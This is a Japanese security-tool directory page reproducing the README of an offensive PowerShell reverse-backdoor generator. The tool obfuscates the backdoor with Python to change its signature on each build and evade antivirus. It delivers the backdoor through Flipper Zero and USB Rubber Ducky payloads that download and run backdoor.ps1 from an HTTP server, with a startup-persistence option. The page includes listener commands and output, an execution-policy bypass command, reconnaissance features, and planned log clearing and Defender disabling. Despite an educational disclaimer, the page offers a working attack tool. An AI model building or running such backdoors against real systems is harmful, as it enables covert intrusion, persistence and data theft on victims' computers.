Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
powershell-backdoor-generator — PowerShellで書かれ、Pythonで難読化されたリバースバックドア。Flipper ZeroやHak5 USB Rubber Duckyなどの一般的なハッキングデバイス向けのペイロードを生成し、ビルドごとにシグネチャを変更してAV回避を支援します。 | Kitploit
ツール/GitHubGitHub/drew-alleman/powershell-backdoor-generator
ペイロード生成シェルコード生成
GitHubdrew-alleman/powershell-backdoor-generator

powershell-backdoor-generator

PowerShellで書かれ、Pythonで難読化されたリバースバックドア。Flipper ZeroやHak5 USB Rubber Duckyなどの一般的なハッキングデバイス向けのペイロードを生成し、ビルドごとにシグネチャを変更してAV回避を支援します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
413653年前Kitploit レビュー済み

/******************************************************************************

  • 免責事項:
  • このプログラムは教育目的のみを意図しています。このプログラムを使用することにより、
  • 使用に伴う潜在的なリスクを理解したものとします。
    • このプログラムは、適切な許可なくシステムやネットワークで使用してはなりません。
  • 許可のない使用は固く禁じられています。
    • このプログラムの作成者は、このプログラムの使用によって生じたいかなる損害、法的
  • 結果、またはデータ損失についても責任を負いません。
    • このプログラムを使用する際は、適用されるすべての法律および規制を遵守する責任は
  • あなたにあります。
  • このプログラムを責任を持って倫理的に使用し、他者のプライバシーとセキュリティを尊重してください。 *****************************************************************************/

powershell-backdoor

Guide
PowerShellで記述され、Pythonで難読化されたリバースバックドアツール。ビルドごとに新しいシグネチャを生成し、検出を回避します。このツールは、Flipper ZeroやHak5 USB Rubber Duckyなどの一般的なハッキングデバイス用のペイロードを作成する機能を備えています。このツールを使用して、高度な攻撃手法に対するシステムの防御をテストしてください。

root@kitploit:~
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
                 [--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
  -h, --help            show this help message and exit
  --ip-address IP_ADDRESS, -i IP_ADDRESS
                        IP Address to bind the backdoor too (default: 192.168.X.XX)
  --port PORT, -p PORT  Port for the backdoor to connect over (default: 4444)
  --random, -r          Randomizes the outputed backdoor's file name
  --out OUT, -o OUT     Specify the backdoor filename (relative file names)
  --verbose, -v         Show verbose output
  --delay DELAY         Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
  --flipper FLIPPER     Payload file for flipper zero (includes EOL conversion) (relative file name)
  --ducky               Creates an inject.bin for the http server
  --server-port SERVER_PORT
                        Port to run the HTTP server on (--server) (default: 8080)
  --payload PAYLOAD     USB Rubber Ducky/Flipper Zero backdoor payload to execute
  --list--payloads      List all available payloads
  -k KEYBOARD, --keyboard KEYBOARD
                        Keyboard layout for Bad Usb/Flipper Zero (default: us)
  -A, --actually-listen
                        Just listen for any backdoor connections
  -H, --listen-and-host
                        Just listen for any backdoor connections and host the backdoor directory

クイックリンク

  • プレビュー
  • 機能
  • 標準バックドア
  • Flipper Zero バックドア
  • USB Rubber Ducky バックドア
  • 謝辞
  • 今後の予定
  • 5回難読化した出力

プレビュー

preview

機能

  • Hak5 Rubber Ducky ペイロード
  • Flipper Zero ペイロード
  • リモートシステムからのファイルダウンロード
  • URLからのwavファイル再生
  • ターゲットコンピュータのパブリックIPアドレス取得
  • ローカルユーザーの一覧表示
  • 興味深いファイルの検索
  • ターゲットシステムのオペレーティングシステム情報の収集
  • ターゲットシステムのBIOS情報の取得
  • アンチウイルスソフトウェアのインストール状況と現在の状態の確認
  • アクティブなTCPクライアントの取得
  • Chocolatey(Windows用の人気パッケージマネージャー)のインストール(https://chocolatey.org/)
  • ターゲットシステムに一般的なペネトレーションテスティングソフトウェアがインストールされているかの確認

標準バックドア

root@kitploit:~
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

現在の作業ディレクトリに backdoor.ps1 というファイルが作成されます。

バックドアの実行

Windows 11、Windows 10、Kali Linuxでテスト済み。非表示ウィンドウで実行し、永続性を持たせるには、こちらのガイドに従ってください。

root@kitploit:~
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
root@kitploit:~
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1

Bad USB / USB Rubber Ducky 攻撃

これらの攻撃のいずれかを使用する場合、バックドアをホストするHTTPサーバーを起動します。バックドアが取得されると、HTTPサーバーはシャットダウンされます。

ペイロード

  • Execute — バックドアを実行
  • BindAndExecute — バックドアをユーザーの一時ディレクトリに配置し、スタートアップにバインドしてから実行します(管理者権限が必要)

Flipper Zero バックドア

以下のコマンドで powershell_backdoor.txt というファイルが生成されます。Flipper上でこれをトリガーすると、コンピュータからHTTP経由でバックドアを取得し実行します。

root@kitploit:~
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

指定したテキストファイル(例: powershell_backdoor.txt)をFlipper Zeroに配置します。ペイロードを実行すると、backdoor.ps1 をダウンロードして実行します。

USB Rubber Ducky バックドア

以下は、Hak5 USB Rubber Ducky用の inject.bin ファイルを生成するチュートリアルです。

root@kitploit:~
 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

現在の作業ディレクトリに inject.bin というファイルが配置されます。この機能にはJavaが必要です。ペイロードを実行すると、backdoor.ps1 をダウンロードして実行します。

謝辞

USB Rubber Ducky攻撃用の payload.txt を inject.bin にエンコードするために、midnitesnake が作成した encoder.jar を使用しています。

今後の予定

  • 最近のRDP接続の取得
  • URLから壁紙を変更
  • 書き込み可能なディレクトリの検索
  • ログのクリア
  • Defenderの無効化

5回難読化した出力

以下は、5回ビルドした後の backdoor.ps1 のsha1ハッシュです。

root@kitploit:~
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49
ツールをダウンロード